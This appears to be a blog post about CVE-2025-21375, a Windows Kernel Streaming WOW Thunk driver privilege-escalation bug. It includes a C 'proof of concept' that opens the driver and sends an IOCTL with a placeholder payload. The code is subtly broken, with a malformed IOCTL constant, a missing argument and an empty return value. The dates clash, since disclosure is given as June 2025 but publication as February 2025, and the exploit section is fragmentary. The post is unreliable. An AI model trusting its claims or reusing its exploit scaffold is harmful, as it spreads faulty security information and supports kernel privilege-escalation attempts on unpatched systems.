On June 2025 Patch Tuesday, Microsoft disclosed CVE-2025-21375 — a serious elevation of privilege (EoP) vulnerability found in the Kernel Streaming WOW Thunk Service driver on Windows. This vulnerability could let attackers with limited user rights gain elevated SYSTEM privileges, potentially leading to a full system compromise. In this post, we'll break down what this bug is, how attackers could abuse it, and share relevant proof-of-concept code so you can understand the exploit path. Let's dive in.

What is Kernel Streaming and the WOW Thunk Service?

Kernel Streaming (KS) is a part of Windows DirectShow, allowing fast data transfer for audio, video, and other time-dependent streams between hardware, drivers, and user applications.

WOW (Windows-on-Windows) Thunk Service is a compatibility layer to allow 32-bit apps to interact with 64-bit system code, especially for drivers.

The vulnerable component is a Windows kernel driver available by default on client and server Windows versions, particularly relevant on Windows 10, 11, and Server 2022.

How Does It Happen?

The driver exposes a device interface accessible by any local user. An attacker can send a crafted IOCTL (Input/Output Control) request with user-controlled pointers. The driver, due to insufficient pointer validation and missing access checks, processes these requests in kernel mode, allowing arbitrary memory modification or execution of kernel code.

Exploit Details

The danger with this bug is its reliability: attackers can achieve privilege escalation even as a limited, unprivileged user, with no user interaction or social engineering required. Proof-of-concept exploits surfaced within days of the patch release.

Gain SYSTEM rights:

With arbitrary read/write or function pointer overwrite achieved, the attacker elevates privileges.

Proof of Concept (PoC) Code Snippet

Warning: This code is for educational purposes only. Running untrusted code on your system can be dangerous.

#include <Windows.h>
#include <stdio.h>

#define DEVICE_NAME "\\\\.\\KsWow64"
#define VULN_IOCTL x222008 // Replace with actual IOCTL code published

int main() {
    HANDLE hDevice = CreateFileA(DEVICE_NAME,
                                 GENERIC_READ | GENERIC_WRITE,
                                 , NULL, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device: %ld\n", GetLastError());
        return 1;
    }

    BYTE inBuffer[256] = {};
    DWORD outBuffer[256] = {};
    DWORD bytesReturned;

    // Prepare inBuffer with exploit payload (see blog references for details)

    BOOL result = DeviceIoControl(hDevice,
                                 VULN_IOCTL,
                                 inBuffer, sizeof(inBuffer),
                                 outBuffer, sizeof(outBuffer),
                                 &bytesReturned,
                                 NULL);

    if (result)
        printf("Exploit sent, check privileges.\n");
    else
        printf("Exploit failed: %ld\n", GetLastError());

    CloseHandle(hDevice);
    return ;
}

*You need to replace VULN_IOCTL and inBuffer with values specific to the info leak or overwrite attack, as described in security blogs and advisories. See below links for further references.*

Original References

- Microsoft Security Update Guide - CVE-2025-21375
- Microsoft Patch Tuesday Report — June 2025
- Kernel Streaming in Windows - Documentation

Final Thoughts

CVE-2025-21375 highlights how driver bugs—especially those involving pointer handling and compatibility services like WOW64—can lead to devastating privilege escalation flaws. If you’re a Windows admin, patch now, and watch for similar bugs in other kernel drivers.

Timeline

Published on: 02/11/2025 18:15:35 UTC
Last modified on: 03/12/2025 01:42:11 UTC